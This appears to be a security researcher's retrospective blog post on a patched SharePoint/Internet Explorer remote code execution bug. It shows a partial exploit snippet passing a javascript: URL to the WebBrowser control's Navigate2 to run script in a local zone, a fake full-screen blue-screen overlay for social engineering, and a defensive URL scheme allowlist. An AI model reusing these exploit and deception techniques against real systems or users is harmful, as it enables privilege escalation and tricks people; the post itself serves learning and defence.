This was a remote code execution finding in a SharePoint component that exposed the WebBrowser control (WebOC) to web content via a CFD (Client-side Framework for DHTML) integration. The Navigate2 API could be called with a javascript: URL that injected a Windows Media Player object into a local-zone document and controlled it, or could directly launch local executables.
RCE via Modeless Dialog + WebOC Navigate2
```javascript
// Exploit snippet from the original finding: Navigate2 on the exposed WebOC
// is handed a javascript: URL, which IE evaluates in the zone of the hosting
// (local-zone SharePoint) document instead of a sandboxed zone. The script
// rewrites the target frame's body to instantiate a Windows Media Player
// <object> (CLSID elided in the original) that the page could then control.
wbControl.Navigate2(
  'javascript:void(document.body.innerHTML = ' +
  '"CMD<object classid=clsid:6BF52A52...></object>")',
  0,                // Flags argument (none)
  'ifr_localFile'   // TargetFrameName: a frame already holding a local-zone document
);
```
Full-Screen Overlay via createPopup (Social Engineering Aid)
```javascript
// createpopup.html — fake BSOD covering the entire screen (social-engineering aid
// from the original finding). IE's window.createPopup() returns an unstyled popup
// window that can be positioned anywhere, so a page can paint a full-screen
// overlay over the desktop; the user is meant to wait it out rather than act.
var a = createPopup();
a.document.body.style.backgroundColor = "blue";
a.document.body.innerHTML = "<h1>A problem has been detected...</h1>";
a.show(0, 0, screen.width, screen.height); // cover the whole screen
```
The core issue was the same as in the Silverlight WebOC finding: Navigate2 with a javascript: URL ran the script in the hosting document’s zone rather than the appropriate sandboxed zone. In this case the hosting document was a local-zone SharePoint page, giving the injected script full local-machine privileges.
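The defensive counterpart to this class of bug is to never hand a navigation API such as Navigate2 an untrusted target without first checking its scheme against an allowlist. The check below is an added example written for this post, not code from the original finding or from SharePoint; `isSafeNavigationTarget`, `guardedNavigate` and the sample URLs are assumptions, and it mirrors the browser URL parser's forgiving normalisation so that control characters or embedded tabs cannot disguise a `javascript:` or local-file target.

```javascript
// Schemes a navigation target is allowed to use (assumption: only web content).
const ALLOWED_SCHEMES = new Set(["http", "https"]);

// Browser URL parsers strip leading/trailing C0 controls and spaces and delete
// ASCII tab/newline anywhere in the input, so the check must do the same or an
// input like " \x00java\tscript:..." would be waved through and still execute.
function normalizeUrl(raw) {
  return String(raw)
    .replace(/[\t\n\r]/g, "")
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "");
}

// Returns true only for targets that are safe to pass to a Navigate2-style API.
function isSafeNavigationTarget(raw) {
  const url = normalizeUrl(raw);
  // RFC 3986 scheme: ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) followed by ":".
  // A Windows drive path ("C:\...") also matches here and is rejected as an
  // unknown scheme, which covers the "launch a local executable" variant.
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (m) {
    return ALLOWED_SCHEMES.has(m[1].toLowerCase());
  }
  // No scheme: relative reference. Reject scheme-relative ("//host", "/\host")
  // and UNC ("\\server\share") forms, which leave the current origin.
  if (/^[\\/]{2}/.test(url)) {
    return false;
  }
  return true;
}

// Wrapper for any object exposing a Navigate2(url) method (hypothetical mock or
// the real control): refuses disallowed targets instead of forwarding them.
function guardedNavigate(control, url) {
  if (!isSafeNavigationTarget(url)) {
    throw new Error("navigation target rejected by scheme allowlist");
  }
  control.Navigate2(normalizeUrl(url));
  return true;
}
```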
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.